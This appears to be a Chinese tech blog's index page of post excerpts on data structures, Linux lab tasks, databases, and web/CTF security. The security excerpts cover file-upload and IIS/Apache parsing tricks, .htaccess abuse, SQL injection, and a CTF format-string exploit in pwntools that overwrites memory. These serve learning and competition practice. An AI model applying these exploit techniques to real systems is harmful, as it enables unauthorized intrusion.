13k 33 分钟

# 线性表 一个具有相同性质的的数据元素的序列 # 顺序存储和链式存储 # 顺序存储 什么是顺序储存呢? 我们学 c 语言没多久就接触到了数组这个概念,这里所了解到的数组就是顺序储存 我们在很多地方都会用到数组使得我们的算法实现更加简单,但是当我们想要删除某个或者在某个位置加入一个元素的时候就会非常的麻烦 如上图中,如果我们想在 12 之间加入一个字母 A,那么我们就需要将所有的元素后移一位,缺点很明显 数据量大的时候需要移动大量数据,不符合算法的设计要求 数组需要开一个庞大的空间为了防止溢出 为了解决这些问题我们可以选用链式存储的方式 #...
2.2k 5 分钟

# 实验 2:Samba 服务器配置 实验目的 1、了解 Samba 协议,理解 Samba 的工作原理 3、熟练掌握 Samba 服务器的配置和故障排除的思路、方法技巧 4、深入理解 Linux 的文件权限管理 4、掌握防火墙 Firewall 的基本配置 5、初步学会配置 SELinux 实验参考 实验步骤可参考《2-1-Samba 服务器配置匿名共享.pdf》文件。 实验步骤可参考《2-2-Samba 服务器配置_安全共享.pdf》文件。 # 1. 实验要求 任务 1:配置 yum 源,使用光盘镜像或者阿里云的 YUM 源安装 Samba 服务包。 任务 2:Samba...
5.3k 13 分钟

# 实验 1:CentOS 8 安装、网络配置、远程访问 实验目的 1、掌握 Linux 虚拟机的安装方法; 2、掌握 Linux 网络配置方法; 3、掌握远程访问 Linux 系统的方式。 # 1. 实验要求 任务 1:安装虚拟机;(实验过程可以省略) 任务 2:安装 CentOS 8(建议:最小化安装); (安装成功后的截图即可) 任务 3:配置网络为 NAT 模式,实现物理机与虚拟机的相互访问。(要求:IP 地址段为学号后两位,即 192.168. 学号.**) (1) 虚拟机配置为动态 IP 地址,Ping 物理主机测试连通性。 (2) 虚拟机配置为静态 IP 地址,Ping...
6.9k 17 分钟

[TOC] # 文件上传漏洞 在文件上传漏洞中,文件上传本身没什么问题,重点是文件上传到服务器后,服务器怎么解析上传的文件,上传漏洞的成因是开发者没有对用户上传的文件进行严格的过滤,攻击者可以上传危险文件 # 解析漏洞 攻击者利用上传漏洞通常会与 web 容器的解析漏洞相结合,下面简单记录一下常见的 web 容器的解析漏洞 # IIS 解析漏洞 iis 中当文件夹命名为【*.asa】或者【**.asp】时,其目录下的所有文件都会被当作 asp 文件来解析 当文件为 *.asp;1.jpg 时,IIS6.0 同样会将文件当作 asp 解析 # Apache 解析漏洞 Apache...
3k 7 分钟

# 2.1 关系数据库结构及形式化定义 # 2.1.1 关系 单一的数据结构 -- 关系 现实世界的实体以及实体之间的关系均用关系来表示 逻辑结构 --- 二维表 从用户角度,关系模型中数据的逻辑结构是一张二维表 # 域 域是一组具有相同数据类型的值的集合 整数、实数、自然数 某一个范围的数 指定长度的字符串集合 # 笛卡尔积 笛卡尔积 给定一组域 D1,D2,…,Dn,这些域中可以有相同的。 D1,D2,…,Dn 的笛卡尔积为: D1×D2×…×Dn =...
5.6k 14 分钟

# 1.1 数据库系统概述 # 1.1.1 四个基本概念 # 数据(data)(选择填空) 数据是数据库中存储的基本对象 定义:数据是描述事物的符号记录 数据的种类有文本,图形,图像,音频,视频,学生的档案记录,货物的运输情况 数据的特点:数据与语义是密不可分的(数据的含义称为数据的语义) 数据是现象,而信息反应实质 # 数据库(database) 定义:数据库是长期储存在计算机内,有组织的、可共享的大量数据的集合 数据库的基本特征有 数据按照一定的数据模型组织、描述和储存 可为各种用户共享 冗余度较小 数据独立性较高 易扩展 # 数据库管理系统(DBMS)Database...
15k 39 分钟

# 查看比赛信息、规则 注意赛方的限制比如说提交 flag 的间隔时间,flag 的获取方式,通防的限制,对后门的处理要求等要注意的点,避免 check 丢分 # 改密码 awd 模式每个队伍会有若干台服务器需要维护,如果主办方平台给的密码较为简单存在弱口令或者可能被爆破成功的机会,尽快修改密码,密码主要是三个方面: ssh 连接密码即本地密码 passwd {用户名} 做修改即可 MySQL 登录密码 1. 使用 SET PASSWORD 命令步骤 1):输入命令mysql -u root -p指定 root 用户登录...
107k 4:28

# php 伪随机数爆破格式转化 str1 = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'str2 = 'KVQP0LdJKRaV3n9D'str3 = str1[::-1]length = len(str2)res = ''for i in range(len(str2)): for j in range(len(str1)): if str2[i] == str1[j]: res += str(j) + ' ' + str(j) +...
7.5k 19 分钟

# 什么是 sql 注入 学一个漏洞我们应该知道,漏洞的危害,成因、原理、攻击方式,以及防御方式。所以这里首先聊一聊什么是 sql 注入,SQL 注入分类于 web 安全漏洞,通过 sql 注入攻击者可以干扰应用程序对其数据库进行查询。它通常允许攻击者查看他们正常无法检索到的数据。许多情况下攻击者可以对数据库进行增删改查的操作 # sql 注入的危害 前面说完了什么是 sql 注入,接下来我们聊一聊 sql 注入漏洞造成的危害,sql...
4.1k 10 分钟

# .htaccess 文件的利用 自动生成.htaccess 的网站 分布式配置文件,它里面存放着 apache 服务器配置相关命令,提供了针对目录改变配置的方法,作用范围是当前目录及其子目录 使用前,首先要启用 htacces,将 AllowOveride 的配置改为 all AllowOverride 从字面上解释是允许覆盖的意思,即 Apache 允许另一配置文件覆盖现有配置文件。 在 AllowOverride 设置为 None 时, .htaccess 文件将被完全忽略。当此指令设置为 All 时,所有具有 “.htaccess” 作用域的指令都允许出现在 .htaccess...
15k 38 分钟

# PWN # create_id 漏洞点 有后门,格式化字符串漏洞,去修改 x 的值为 9,然后获取 flag 即可。 from pwn import *p=process(./k)d = int(p.recv(10), 16)for I in range(3):p.sendline('123')king = p32(d)+'%5c%10$n'p.sendline(king)p.interactive()# sim_treasure 漏洞点: 无后门,格式化字符串漏洞。 泄露 libc 基地址,修改 printf 的 got 表为 system,执行...